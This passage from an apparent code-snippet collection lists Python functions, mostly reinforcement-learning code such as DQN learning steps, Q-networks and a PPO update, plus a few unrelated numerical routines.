gamma):\n states, actions, rewards, next_states, dones, weights, indexes = experiences\n\n q_expected, q_targets = self.get_target_and_expected(states, \n actions, \n rewards, \n next_states, \n dones, \n gamma)\n\n #print('q_expected.shape', q_expected.shape)\n #print('q_targets.shape', q_targets.shape)\n \n # Compute loss\n ##### deltas = F.mse_loss(q_expected, q_targets)\n deltas = q_expected - q_targets\n #print('loss.shape', loss.data.cpu().numpy().shape)\n #print('loss', loss)\n \n _sampling_weights = (torch.Tensor(weights)\n .view((-1, 1)))\n \n # mean square error\n loss = torch.mean((deltas * _sampling_weights)**2)\n\n # importance sampling weights used to correct bias introduced \n # by prioritisation experience replay\n # See Annealing the bias https://arxiv.org/abs/1511.05952\n #with torch.no_grad():\n # weight = sum(np.multiply(weights, loss.data.cpu().numpy()))\n # print('weight', 
weight)\n # loss *= weight\n # print('weights.shape', weights.shape)\n # print('loss type', type(loss))\n # print('loss shape', loss.size())\n # loss *= weights\n # Minimize the loss\n # call zero_grad before calling backward() \n # o.w. gradients are accumulated from multiple passes\n self.optimizer.zero_grad()\n # backward computes dloss/dx for every parameter x\n loss.backward()\n # updates parameters\n self.optimizer.step()\n\n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU) \n \n # ------------------- update priorities ------------------- # \n priorities = abs(deltas.detach()).numpy()\n #priorities = abs(q_expected.detach() - q_targets.detach()).numpy()\n self.memory.update_priorities(priorities, indexes)", "def get_action(self,state):\n \n q_values = self.__network.predict(state[None])[0]\n \n ###YOUR CODE\n if np.random.rand()<self.epsilon:\n return np.random.choice(self.n_actions)\n return np.argmax(q_values)", "def q_values(self):\n # reshape input to 4d tensor [batch, height, width, channels]\n input = tf.reshape(self.state,\n [-1,\n Parameters.IMAGE_HEIGHT,\n Parameters.IMAGE_WIDTH,\n Parameters.AGENT_HISTORY_LENGTH])\n\n # convolutional layer 1\n \"\"\"\n [Article] The first hidden layer convolves 32 filters of 8 x 8 with stride 4 with the\n input image and applies a rectifier nonlinearity\n \"\"\"\n W_conv1 = self.weight_variable(\n [8, 8, Parameters.AGENT_HISTORY_LENGTH, 32])\n b_conv1 = self.bias_variable([32])\n conv1 = tf.nn.conv2d(\n input,\n W_conv1,\n strides=[1, 4, 4, 1],\n padding='VALID') # would 'SAME' also work ?\n h_conv1 = tf.nn.relu(conv1 + b_conv1)\n\n # output of conv 1 is of shape [-1 x 20 x 20 x 32]\n\n # convolutional layer 2\n \"\"\"\n [Article] The second hidden layer convolves 64 filters of 4 x 4 with stride 2,\n again followed by a rectifier nonlinearity\n \"\"\"\n W_conv2 = self.weight_variable([4, 4, 32, 64])\n b_conv2 = self.bias_variable([64])\n conv2 = tf.nn.conv2d(\n h_conv1, W_conv2, strides=[1, 2, 2, 1], padding='VALID')\n h_conv2 = tf.nn.relu(conv2 + b_conv2)\n\n # output of conv 2 is of shape [-1 x 9 x 9 x 64]\n\n # convolutional layer 3\n \"\"\"\n [Article] This is followed by a third convolutional layer that convolves\n 64 filters of 3 x 3 with stride 1 followed by a rectifier\n \"\"\"\n W_conv3 = self.weight_variable([3, 3, 64, 64])\n b_conv3 = self.bias_variable([64])\n conv3 = tf.nn.conv2d(\n h_conv2, W_conv3, strides=[1, 1, 1, 1], padding='VALID')\n h_conv3 = tf.nn.relu(conv3 + b_conv3)\n\n # output of conv 3 is of shape [-1 x 7 x 7 x 64]\n\n h_conv3_flat = tf.reshape(h_conv3, [-1, 7 * 7 * 64])\n\n # fully connected layer 1\n W_fc1 = self.weight_variable([7 * 7 * 64, 512])\n b_fc1 = self.bias_variable([512])\n fc1 = tf.matmul(h_conv3_flat, W_fc1)\n self.h_fc1 = h_fc1 = tf.nn.relu(fc1 + b_fc1)\n\n # fully connected layer 2 (output layer)\n W_fc2 = self.weight_variable([512, self.action_space])\n b_fc2 = self.bias_variable([self.action_space])\n fc2 = tf.matmul(h_fc1, W_fc2)\n\n # network output is of shape (1, self.action_space)\n \"\"\"\n [Article] We use an architecture in which there is a separate output unit\n for each possible action [ = one-hot encoding ], and only the state representation\n is an input to the neural network. 
The outputs correspond to the predicted Q-values of\n the individual actions for the input state.\n \"\"\"\n predicted_q_values = fc2 + b_fc2\n\n # saving learning parameters and layers output to access them directly\n # if needed\n\n self.learning_parameters[\"W_conv1\"], self.learning_parameters[\"b_conv1\"] = W_conv1, b_conv1\n self.layers[\"conv1\"], self.layers[\"h_conv1\"] = conv1, h_conv1\n\n self.learning_parameters[\"W_conv2\"], self.learning_parameters[\"b_conv2\"] = W_conv2, b_conv2\n self.layers[\"conv2\"], self.layers[\"h_conv2\"] = conv2, h_conv2\n\n self.learning_parameters[\"W_conv3\"], self.learning_parameters[\"b_conv3\"] = W_conv3, b_conv3\n self.layers[\"conv3\"], self.layers[\"h_conv3\"], self.layers[\"h_conv3_flat\"] = conv3, h_conv3, h_conv3_flat\n\n self.learning_parameters[\"W_fc1\"], self.learning_parameters[\"b_fc1\"] = W_fc1, b_fc1\n self.layers[\"fc1\"], self.layers[\"h_fc1\"] = fc1, h_fc1\n\n self.learning_parameters[\"W_fc2\"], self.learning_parameters[\"b_fc2\"] = W_fc2, b_fc2\n self.layers[\"fc2\"], self.layers[\"h_fc2\"] = fc2, predicted_q_values\n\n return(predicted_q_values)", "def get_learning_rate():\n return 0.00001", "def call(self, states):\n # TODO: implement this ~\n l1 = tf.nn.relu(self.Q_1(states))\n l2 = tf.nn.relu(self.Q_2(l1))\n qVals = self.Q_3(l2)\n return qVals\n # return tf.argmax(qVals, 1)", "def getPredictions(self):\n\t\tself.bestLabel = self.testingProbs.apply(lambda x: x.argmax(),1)", "def learn(self):\n \n # target parameter update\n # target parameter update\n if self.learn_step_counter % self.nu_iter == 0:\n self.target_net.load_state_dict(self.eval_net.state_dict())\n #testing the preformace of the network\n if self.learn_step_counter == 0:\n print('As referece this first test on dev data. Is maded with the Q networks, initialized randomly : ' )\n else:\n print(\"\\n Lets copy the Q-value Net in to Q-target net!. And test the performace on the dev data: \")\n \n current_bleu = self.dev_network()\n print(\"Current Bleu score is: \", current_bleu)\n \n self.learn_step_counter += 1\n\n \n long_Batch = self.sample_size*3\n # Sampling the higgest rewards values\n b_memory_big = self.memory[np.argsort(-self.memory[:-self.max_output_length, self.state_size+1])][:long_Batch]\n \n sample_index = np.random.choice(long_Batch, self.sample_size)\n b_memory = b_memory_big[sample_index, :]\n\n b_s = torch.FloatTensor(b_memory[:, :self.state_size])\n b_a = torch.LongTensor(b_memory[:, self.state_size:self.state_size+1].astype(int))\n b_r = torch.FloatTensor(b_memory[:, self.state_size+1:self.state_size+2])\n b_s_ = torch.FloatTensor(b_memory[:, self.state_size+2: self.state_size+2 + self.state_size])\n\n b_is_eos = torch.FloatTensor(b_memory[:, self.size_memory1-1:]).view(self.sample_size, 1)\n #print(b_a, b_a.size)\n #print(b_is_eos)\n #Activate the eval_net\n unfreeze_model(self.eval_net)\n \n # q_eval w.r.t the action in experience\n q_eval = self.eval_net(b_s).gather(1, b_a) # shape (batch, 1)\n q_next = self.target_net(b_s_).detach() # detach from graph, don't backpropagate\n #taking the most likely action.\n b_a_ = torch.LongTensor(q_next.max(1)[1].view(self.sample_size, 1).long())\n #b_a_ = q_next.max(1)[0].view(self.sample_size, 1).long() # shape (batch, 1)\n q_eval_next = self.eval_net(b_s_).gather(1, b_a_) # shape (batch, 1)\n \n #If eos q_target = reward. 
\n q_target = b_r + self.gamma * b_is_eos* q_eval_next.view(self.sample_size, 1) # shape (batch, 1)\n #version 0\n #q_target = b_r + self.gamma * q_next.max(1)[0].view(self.sample_size, 1) # shape (batch, 1)\n \n loss = self.loss_func(q_eval, q_target)\n \n self.tb_writer.add_scalar(\"learn/learn_batch_loss\",\n loss.data, self.learn_step_counter)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n #desctivate the eval_net\n freeze_model(self.eval_net)", "def _model(self, scope):\n\n with tf.variable_scope(scope):\n\n act = tf.nn.elu\n initializer = tfcl.variance_scaling_initializer()\n xs = tf.layers.dense(self.state, 400, act, kernel_initializer=initializer)\n xs = tf.layers.dense(xs, 300, None, kernel_initializer=initializer)\n\n xa = tf.layers.dense(self._action, 400, act, kernel_initializer=initializer)\n xa = tf.layers.dense(xa, 300, None, kernel_initializer=initializer)\n\n x = tf.nn.elu(xa + xs)\n\n q_value = tf.layers.dense(x, 1, None, kernel_initializer=initializer)\n\n return q_value", "def est_return(self, r, mask):\n batchsz = r.size(0)\n\n # v_target is worked out by Bellman equation.\n v_target = torch.Tensor(batchsz).to(device=DEVICE)\n\n prev_v_target = 0\n for t in reversed(range(batchsz)):\n # mask here indicates a end of trajectory\n # this value will be treated as the target value of value network.\n # mask = 0 means the immediate reward is the real V(s) since it's end of trajectory.\n # formula: V(s_t) = r_t + gamma * V(s_t+1)\n v_target[t] = r[t] + self.gamma * prev_v_target * mask[t]\n # update previous\n prev_v_target = v_target[t]\n\n return v_target", "def calc_q_values(self, state): \n q_vals = self.q_network.predict(np.swapaxes(state,0,3))\n return q_vals", "def calculate_q_targets(q1_batch, q2_batch, r_batch, nonterminal_batch, gamma=.99):\r\n\r\n actions = torch.argmax(q1_batch, dim=1)\r\n\r\n max_q2 = q2_batch[torch.arange(q2_batch.size(0)), actions]\r\n\r\n Y = r_batch + gamma * max_q2\r\n\r\n Y[~nonterminal_batch] = r_batch[~nonterminal_batch]\r\n\r\n return Y", "def train(self, iterations: int):\n\n s = \"{:3d} reward {:6.2f}/{:6.2f}/{:6.2f} len {:6.2f} epsilon {:1.3f} {}\"\n s_check = \"{:3d} reward {:6.2f}/{:6.2f}/{:6.2f} len {:6.2f} epsilon {:1.3f} saved {} \"\n total_steps = 0\n iter_metrics = []\n for n in range(iterations):\n r_min, r_mean, r_max, iter_steps = self.train_iter()\n iter_metrics.append((r_min, r_mean, r_max))\n total_steps += iter_steps\n\n if n == int(iterations / 2):\n self.steps_to_update_target_model = int(self.steps_to_update_target_model / 2)\n\n # checkpointing & logging\n s_print = s\n file_name = \"\"\n if n % self.checkpoint_freq == 0:\n file_name = f'my_dqn_{n}.pth'\n torch.save(self.target_dqn.state_dict(), os.path.join(self.checkpoint_path, file_name))\n s_print = s_check\n\n if self.verbose:\n print(s_print.format(\n n + 1,\n r_min,\n r_mean,\n r_max,\n total_steps,\n self.e_greedy,\n file_name\n ))\n iter_min = np.mean([x[0] for x in iter_metrics])\n iter_mean = np.mean([x[1] for x in iter_metrics])\n iter_max = np.mean([x[2] for x in iter_metrics])\n return iter_min, iter_mean, iter_max", "def learn(self):\n if self.learn_step_counter % self.target_q_update_step == 0:\n self.target_net.load_state_dict(self.eval_net.state_dict()) #update target_net's parameters\n logging.info(\"updtate target q\")\n self.learn_step_counter += 1\n\n rgbs,depths, rgbs_1, depths_1,questions,actions,rewards,terminals = self.memory.sample()\n\n rgbs_var = Variable(torch.FloatTensor(rgbs).cuda())\n depths_var = 
Variable(torch.FloatTensor(depths).cuda())\n rgbs_1_var = Variable(torch.FloatTensor(rgbs_1).cuda())\n depths_1_var = Variable(torch.FloatTensor(depths_1).cuda())\n questions_var = Variable(torch.LongTensor(questions).cuda())\n actions_var = Variable(torch.LongTensor(actions).cuda())\n rewards_var = Variable(torch.FloatTensor(rewards).cuda())\n terminals_var = Variable(torch.FloatTensor(terminals).cuda())\n\n q_eval_matrix = self.eval_net(rgbs_var,depths_var,questions_var)\n q_eval_matrix = q_eval_matrix.view(-1,9*28*28)\n actions_var = actions_var.view(-1,1)\n q_eval = torch.gather(q_eval_matrix, 1, actions_var) \n q_eval = q_eval.squeeze(1)\n\n q_next_matrix = self.target_net(rgbs_1_var,depths_1_var,questions_var).detach() #don't backward\n q_next_matrix = q_next_matrix.view(-1,9*28*28)\n q_next = torch.max(q_next_matrix,1)[0]\n\n one_var = Variable(torch.ones_like(terminals_var))\n\n q_target = rewards_var + (one_var- terminals_var)*self.discount * q_next\n \n loss = self.loss_func(q_eval, q_target)\n\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n self.task_total_loss += loss.item()\n self.task_total_q += q_target.mean()\n self.update_count += 1", "def __init__(self, input, n_out, y):\n n_in = input.get_shape()[1].value\n self.input = input\n\n # Initiate the weight and biases for this layer\n r = 4*np.sqrt(6.0/(n_in + n_out))\n w = tf.Variable(tf.random_uniform([n_in, n_out], minval=-r, maxval=r))\n b = tf.Variable(tf.zeros([n_out]), name='b')\n\n pred = tf.add(tf.matmul(input, w), b)\n ################\n temp = tf.nn.softmax(pred)\n\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))\n\n # Evaluate model\n correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n \n self.y = y\n self.w = w\n self.b = b\n self.cost = cost\n ###############\n self.temp = temp\n self.params= [w]", "def learn(self, experiences, gamma):\n states, actions, rewards, next_states, dones = experiences\n\n # Get max predicted Q values (for next states) from target model\n Q_targets_next = self.qnetwork_target(\n next_states).detach().max(1)[0].unsqueeze(1)\n \n # Compute Q targets for current states \n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n\n # Get expected Q values from local model\n Q_expected = self.qnetwork_local(states).gather(1, actions)\n\n # Compute loss\n loss = F.mse_loss(Q_expected, Q_targets)\n\n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, self.tau) \n\n return", "def fun(_, y):\n return np.array([-self.r * self.beta * y[1] * y[0] / self.N,\n self.r * self.beta * y[1] * y[0] / self.N - self.gamma * y[1],\n self.gamma * y[1]])", "def _preprocess_experience(self):\n observed_inputs = []\n observed_reward = []\n predicted_outputs = []\n distance_from_reward = []\n next_state = []\n # process inputs and outputs to train the net\n for episode in self.examples:\n episode_match, example_reward = episode\n last_step = True\n for n, step in enumerate(reversed(episode_match)):\n this_state = state_from_hash(step.state_t)\n next_state.append(state_from_hash(step.action_t))\n observed_inputs.append(np.hstack((this_state,\n this_state != next_state[-1]))\n .flatten())\n distance_from_reward.append(n)\n # now we have to evaluate max_{s'}[Q(a',s')]\n # let's see all possible actions two steps 
ahead\n two_ahead = []\n for possible_action in self.state_space[step.action_t].actions:\n possible_action = state_from_hash(possible_action)\n two_ahead.append(np.hstack((next_state[-1],\n next_state[-1] != possible_action))\n .flatten())\n if not two_ahead:\n # if it's a terminal state, no two-ahead, so set the max to 0\n max_next_state = 0\n else:\n # evaluate Q on the two-ahead actions\n two_ahead = np.array(two_ahead)\n two_ahead[two_ahead == 2] = -1\n max_next_state = self.sess.run(\n self.output,\n feed_dict={self.input: two_ahead}).flatten()\n\n # calc the maximum\n max_next_state = np.max(max_next_state)\n predicted_outputs.append(max_next_state)\n if last_step:\n # because we start from last step, `last_step` will be true\n observed_reward.append(example_reward)\n # then set it to false so non-last steps get reward 0\n last_step = False\n else:\n observed_reward.append(0)\n # Q-network output from the inputs\n predicted_outputs = self.discount * np.vstack(predicted_outputs).flatten()\n observed_inputs = np.array(observed_inputs)\n # possible max value in a state is 2, set all 2's to -1's\n observed_inputs[observed_inputs == 2] = -1\n observed_reward = np.vstack(observed_reward).flatten()\n return observed_inputs, observed_reward, predicted_outputs, distance_from_reward", "def calculate_gamma(self):\n result = self.result\n # scaler = preprocessing.StandardScaler()\n # train_minmax = scaler.fit_transform(result)\n # st_rho, st_delta = train_minmax[:, 0], train_minmax[:, 1]\n # self.gamma = (st_delta + st_rho) / 2\n self.gamma = result[:, 0] * result[:, 1]\n self.gamma_des_index = np.argsort(-self.gamma)", "def gamma(self, predictor):\n pred = predictor(self.X)\n self.tags[_PREDICTION] = pred\n expect_event = self.tags.groupby(_EVENT).mean()\n expect_group_event = self.tags.groupby(\n [_EVENT, _GROUP_ID]).mean()\n\n num_grp = len(self.error_rate)\n tprs = [0 for _ in range(num_grp)]\n # print(expect_group_event)\n for i in range(num_grp):\n tprs[i] = expect_group_event.loc[(expect_group_event.index.get_level_values(_GROUP_ID) == i)].groupby([_EVENT]).mean()\n expect_group_event.loc[('label=1', i), 'pred'] = (1 - self.error_rate[i][0]) * tprs[i].loc['label=1', 'pred'] + self.error_rate[i][0] * tprs[i].loc['label=0', 'pred']\n expect_group_event.loc[('label=0', i), 'pred'] = (1 - self.error_rate[i][1]) * tprs[i].loc['label=0', 'pred'] + self.error_rate[i][1] * tprs[i].loc['label=1', 'pred']\n\n # neg = expect_group_event.loc[(expect_group_event.index.get_level_values(_GROUP_ID) == 0.0)].groupby([_EVENT]).mean()\n # pos = expect_group_event.loc[(expect_group_event.index.get_level_values(_GROUP_ID) == 1.0)].groupby([_EVENT]).mean()\n\n # expect_group_event.loc[('label=1.0', 1), 'pred'] = (1 - self.error_rate[1][0]) * pos.loc['label=1.0', 'pred'] + self.error_rate[1][1] * pos.loc['label=0.0', 'pred']\n # expect_group_event.loc[('label=0.0', 1), 'pred'] = (1 - self.error_rate[1][1]) * pos.loc['label=0.0', 'pred'] + self.error_rate[1][0] * pos.loc['label=1.0', 'pred']\n\n # expect_group_event.loc[('label=1.0', 0), 'pred'] = (1 - self.error_rate[0][0]) * neg.loc['label=1.0', 'pred'] + self.error_rate[0][1] * neg.loc['label=0.0', 'pred']\n # expect_group_event.loc[('label=0.0', 0), 'pred'] = (1 - self.error_rate[0][1]) * neg.loc['label=0.0', 'pred'] + self.error_rate[0][0] * neg.loc['label=1.0', 'pred']\n\n expect_event = expect_group_event.groupby(_EVENT).mean()\n expect_group_event[_DIFF] = expect_group_event[_PREDICTION] - expect_event[_PREDICTION]\n\n # expect_group_event[_DIFF] = 
expect_group_event[_PREDICTION] - expect_event[_PREDICTION]\n g_unsigned = expect_group_event[_DIFF]\n g_signed = pd.concat([g_unsigned, -g_unsigned],\n keys=[\"+\", \"-\"],\n names=[_SIGN, _EVENT, _GROUP_ID])\n self._gamma_descr = str(expect_group_event[[_PREDICTION, _DIFF]])\n return g_signed", "def predict(self, state):\n inputs = state.reshape((1, ) + state.shape)\n action = np.zeros((1, 1)).astype(int)\n target_q = np.zeros((1, self.atoms))\n out = self.actor.predict([inputs, action, target_q])\n out = np.sum(out[0] * self.z_lin, 1)\n # print(Q.shape)\n return np.argmax(out)", "def RatingsGradientDescent(params, Y, R, num_users, num_movies, num_features, lbd, alpha, num_iters):\n J_history = np.zeros(num_iters)\n for i in range(num_iters):\n J_history[i], grad = cofiCostFunc(params, Y, R, num_users, num_movies, num_features, lbd)\n params = params-alpha*grad\n if i % 100 == 99:\n print('Step %i, cost=%f' % (i+1, J_history[i]))\n return params, J_history", "def step(self, x, y, learning_rate=1e-3):\n \n # Input transformation\n \"\"\"\n Input is represented with M-dimensional vectors\n We convert them to (N, M) matrices such that columns are one-hot \n representations of the input\n \"\"\"\n x = self.one_hot(x, self.N)\n y = self.one_hot(y, self.N)\n\n \n # Forward propagation\n \"\"\"\n Returns\n -------\n embedding: array\n (D, M) matrix where columns are word embedding from U matrix\n logits: array\n (N, M) matrix where columns are output logits\n prob: array\n (N, M) matrix where columns are output probabilities\n \"\"\"\n \n ### YOUR CODE HERE ###\n #Omran:\n #U and V of dimension (D, N) and (N, D) respectively\n\n embedding = np.dot(self.U, x)\n logits = np.dot(self.V, embedding)\n prob = self.softmax(logits,0)# take care of the axis, I am not quite sure how you will implement it\n \n assert embedding.shape == (self.D, x.shape[1])\n assert logits.shape == (self.N, x.shape[1])\n assert prob.shape == (self.N, x.shape[1])\n \n \n # Loss calculation\n \"\"\"\n Returns\n -------\n loss: int\n Cross-entropy loss using true values and probabilities\n \"\"\"\n \n ### YOUR CODE HERE ###\n loss = self.loss(y, prob)\n \n # Backward propagation\n \"\"\"\n Returns\n -------\n d_U: array\n (N, D) matrix of partial derivatives of loss w.r.t. U\n d_V: array\n (D, N) matrix of partial derivatives of loss w.r.t. V\n \"\"\"\n \n ### YOUR CODE HERE ###\n #I am not quite sure of this!!\n \n# difference = np.sum(np.subtract(prob, y), axis=1)\n difference = prob - y\n d_V = difference @ embedding.T\n# print(self.N, self.D)\n# print(difference.shape)\n# print(d_V.shape)\n d_U = (self.V.T @ difference) @ x.T\n# d_U = self.V.T @ np.outer(difference, x)\n \n assert d_V.shape == (self.N, self.D)\n assert d_U.shape == (self.D, self.N)\n \n \n # Update the parameters\n \"\"\"\n Updates the weights with gradient descent such that W_new = W - alpha * dL/dW, \n where alpha is the learning rate and dL/dW is the partial derivative of loss w.r.t. 
\n the weights W\n \"\"\"\n \n ### YOUR CODE HERE ###\n self.V = self.V - learning_rate * d_V\n self.U = self.U - learning_rate * d_U\n\n return loss, d_U, d_V", "def update_policy(self, minibatch_size):\n \n steps = self.rewards.shape[0]\n batch_size = self.rewards.shape[0] * self.rewards.shape[1]\n #steps = 500\n #batch_size = 500\n #print(steps)\n #print(batch_size)\n \n # Compute advantages\n '''\n with torch.no_grad():\n if self.gae:\n advantages = torch.zeros_like(self.rewards).to(self.training_device)\n lastgaelam = 0\n for t in reversed(range(steps)):\n if t == steps - 1:\n nextnonterminal = 1.0 - self.dones[t]\n nextvalues = self.state_values[t]\n else:\n nextnonterminal = 1.0 - self.dones[t + 1]\n nextvalues = self.state_values[t + 1]\n delta = self.rewards[t] + self.gamma * nextvalues * nextnonterminal - self.state_values[t]\n advantages[t] = lastgaelam = delta + self.gamma * self.gae_lambda * nextnonterminal * lastgaelam\n returns = advantages + self.state_values\n else:\n returns = torch.zeros_like(self.rewards).to(self.training_device)\n for t in reversed(range(steps)):\n if t == steps - 1:\n nextnonterminal = 1.0 - self.dones[t]\n next_return = self.state_values[t]\n else:\n nextnonterminal = 1.0 - self.dones[t+1]\n next_return = returns[t+1]\n returns[t] = self.rewards[t] + self.gamma * nextnonterminal * next_return\n advantages = returns - self.state_values\n ''' \n returns = torch.zeros_like(self.rewards).to(self.training_device)\n for t in reversed(range(steps)):\n if t == steps - 1:\n nextnonterminal = 1.0 - self.dones[t]\n next_return = self.state_values[t]\n else:\n nextnonterminal = 1.0 - self.dones[t+1]\n next_return = returns[t+1]\n returns[t] = self.rewards[t] + self.gamma * nextnonterminal * next_return\n advantages = returns - self.state_values\n \n\n # flatten the batch\n #b_obs = self.states.reshape((-1,) + self.state_space)\n #print(self.states.shape)\n b_obs = self.states.reshape((-1,4)).detach()\n b_logprobs = self.action_probs.reshape(-1,1).detach()\n b_actions = self.actions.reshape((-1,)).detach()\n b_advantages = advantages.reshape(-1,1)\n b_returns = returns.reshape(-1,1)\n b_values = self.state_values.reshape(-1,1)\n \n # Optimize policy and value network for K epochs, run optimization in minibatches\n \n inds = np.arange(batch_size)\n for i_epoch_pi in range(self.epochs):\n np.random.shuffle(inds)\n for start in range(0, batch_size, minibatch_size):\n end = start + minibatch_size\n minibatch_ind = inds[start:end]\n mb_advantages = b_advantages[minibatch_ind]\n if self.norm_adv:\n mb_advantages = (mb_advantages - mb_advantages.mean()) / (mb_advantages.std() + 1e-8)\n \n #_, newlogproba, entropy = self.get_action(b_obs[minibatch_ind], b_actions[minibatch_ind])\n newlogproba, entropy = self.evaluate(b_obs[minibatch_ind], b_actions[minibatch_ind])\n #ratio = (newlogproba - b_logprobs[minibatch_ind]).exp()\n ratio = torch.exp((newlogproba - b_logprobs[minibatch_ind].detach()))\n \n # Stats\n approx_kl = (b_logprobs[minibatch_ind] - newlogproba).mean()\n\n # Policy loss\n pg_loss1 = -mb_advantages * ratio\n pg_loss2 = -mb_advantages * torch.clamp(ratio, 1 - self.clip_epsilon, 1 + self.clip_epsilon)\n pg_loss = torch.max(pg_loss1, pg_loss2).mean()\n entropy_loss = entropy.mean()\n\n # Value loss\n _, new_values = self.policy.forward(b_obs[minibatch_ind])\n if self.clip_vloss:\n \n v_loss_unclipped = self.MseLoss(new_values,b_returns[minibatch_ind])\n #v_loss_unclipped = ((new_values - b_returns[minibatch_ind]) ** 2)\n v_clipped = b_values[minibatch_ind] + 
torch.clamp(new_values - b_values[minibatch_ind],\n -self.clip_epsilon, self.clip_epsilon)\n #v_loss_clipped = (v_clipped - b_returns[minibatch_ind]) ** 2\n v_loss_clipped = self.MseLoss(v_clipped,b_returns[minibatch_ind])\n v_loss_max = torch.max(v_loss_unclipped, v_loss_clipped)\n #v_loss = 0.5 * v_loss_max.mean()\n v_loss = 0.5 * v_loss_max\n else:\n #v_loss = 0.5 * ((new_values - b_returns[minibatch_ind]) ** 2).mean()\n v_loss = self.MseLoss(new_values,b_returns[minibatch_ind])\n\n loss = pg_loss + v_loss * self.vf_coeff - self.ent_coeff * entropy_loss\n\n self.optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(self.policy.parameters(), self.max_grad_norm)\n self.optimizer.step()\n # Copy new weights into old policy:\n self.old_policy.load_state_dict(self.policy.state_dict())", "def setConstQuantityAndBetaEqState(self, pointDict, quantity, target):\n print \"setConstQuantityAndBetaEqState: \", pointDict\n assert 'ye' not in pointDict, \"You can't SPECIFY a Ye if you're \" \\\n \"setting neutrinoless beta equlibrium!\"\n self.validatePointDict(pointDict)\n assert len(pointDict) < 2, \"State overdetermined for more than 1 indVars!\"\n #todo: check quantity is valid 3D table\n\n #defines 1D root solver to use in routine\n solveRoot = scipyOptimize.brentq # solveRootBisect\n\n solveVarName = 'logtemp'\n currentSolveVar = 0.0\n currentYe = 0.25\n #previous variables used to measure convergence of solve\n # so set them to something significantly different than starting values\n previousSolveVar = 100.0\n previousYe = 100.0\n yeError = relativeError(currentYe, previousYe)\n solveVarError = relativeError(currentSolveVar, previousSolveVar)\n otherVarName = pointDict.keys()[0]\n otherVar = pointDict.values()[0]\n\n maxIters = 5\n tol = 1e-3\n\n iteration = 0\n while iteration < maxIters and yeError + solveVarError > tol/2.0:\n previousSolveVar = currentSolveVar\n previousYe = currentYe\n getSolveVar = lambda x: multidimInterp((currentYe, x, otherVar),\n [self.h5file['ye'][:],\n self.h5file[solveVarName],\n self.h5file[otherVarName]],\n self.h5file[quantity][...],\n linInterp, 2) - target\n try:\n currentSolveVar = solveRoot(getSolveVar,\n self.h5file[solveVarName][0],\n self.h5file[solveVarName][-1],\n (),tol)\n except ValueError as err:\n print \"Root for log10(T) not bracketed on entire table: \" \\\n + str(err)\n # see if lower or upper temperature bound best\n logtemp = self.h5file['logtemp']\n answer1 = multidimInterp((currentYe, logtemp[0], otherVar),\n [self.h5file['ye'][:],\n self.h5file['logtemp'],\n self.h5file['logrho']],\n self.h5file[quantity][...],\n linInterp, 2) - target\n answer2 = multidimInterp((currentYe, logtemp[-1], otherVar),\n [self.h5file['ye'][:],\n self.h5file['logtemp'],\n self.h5file['logrho']],\n self.h5file[quantity][...],\n linInterp, 2) - target\n\n if (abs(answer1) < abs(answer2)):\n currentSolveVar = self.h5file['logtemp'][0]\n print \"Recovering with lowest table value, answer: %s\" % currentSolveVar\n else:\n currentSolveVar = self.h5file['logtemp'][-1]\n print \"Recovering with highest value, answer: %s\" % currentSolveVar\n\n getYe = lambda x : multidimInterp((x, currentSolveVar, otherVar),\n [self.h5file['ye'][:],\n self.h5file[solveVarName],\n self.h5file[otherVarName]],\n self.h5file['munu'][...],\n linInterp, 2)\n #check for bracketing error in root solve for ye\n try:\n currentYe = solveRoot(getYe,\n self.h5file['ye'][0],\n self.h5file['ye'][-1], (), tol)\n except ValueError as err:\n print \"Error in scipy root solver solving for 
ye: \", str(err)\n currentYe = self.findYeOfMinAbsMunu((currentSolveVar, otherVar))\n print \"Recovering with findYeOfMinAbsMunu, answer: %s\" % currentYe\n #print \"currentYe: \", currentYe, \"\\tcurrentT: \", currentSolveVar\n\n yeError = relativeError(currentYe, previousYe)\n solveVarError = relativeError(currentSolveVar, previousSolveVar)\n iteration += 1\n #print \"errs: \", yeError, solveVarError\n\n newDict = pointDict.copy()\n newDict['ye'] = currentYe\n temp = numpy.power(10.0,currentSolveVar) # TODO TEMP HARD CODE\n newDict['temp'] = temp\n self.setState(newDict)\n return currentYe, temp # TODO TEMP HARD CODE", "def choose_action( self):\n \"\"\"greedy, random, e-greedy, boltzmann, bayesian\"\"\"\n\tif self.exploration == \"greedy\":\n #Choose an action with the maximum expected value.\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:1.0})\n a = a[0]\n return a\n if self.exploration == \"random\":\n #Choose an action randomly.\n a = env.action_space.sample()\n if self.exploration == \"e-greedy\":\n #Choose an action by greedily (with e chance of random action) from the Q-network\n if np.random.rand(1) < e or total_steps < pre_train_steps:\n a = env.action_space.sample()\n else:\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:1.0})\n a = a[0]\n return a\n if self.exploration == \"boltzmann\":\n #Choose an action probabilistically, with weights relative to the Q-values.\n Q_d,allQ = sess.run([q_net.Q_dist,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.Temp:e,q_net.keep_per:1.0})\n a = np.random.choice(Q_d[0],p=Q_d[0])\n a = np.argmax(Q_d[0] == a)\n return a\n if self.exploration == \"bayesian\":\n #Choose an action using a sample from a dropout approximation of a bayesian q-network.\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:(1-e)+0.1})\n a = a[0]\n return a", "def train_step(self, experiences, gamma):\n states = experiences['states']\n rewards = experiences['rewards']\n actions = experiences['actions']\n next_states = experiences['next_states']\n dones = experiences['dones']\n q_values = self.main_network(states).gather(1, actions.view(-1, 1)).squeeze()\n\n # Get max predicted Q values (for next states) from target model\n next_q_values = self.target_network(next_states).detach().max(1)[0]\n\n # Compute Q targets for current states\n expected_q_value = rewards + (gamma * next_q_values * (1 - dones))\n\n # Compute loss\n loss = 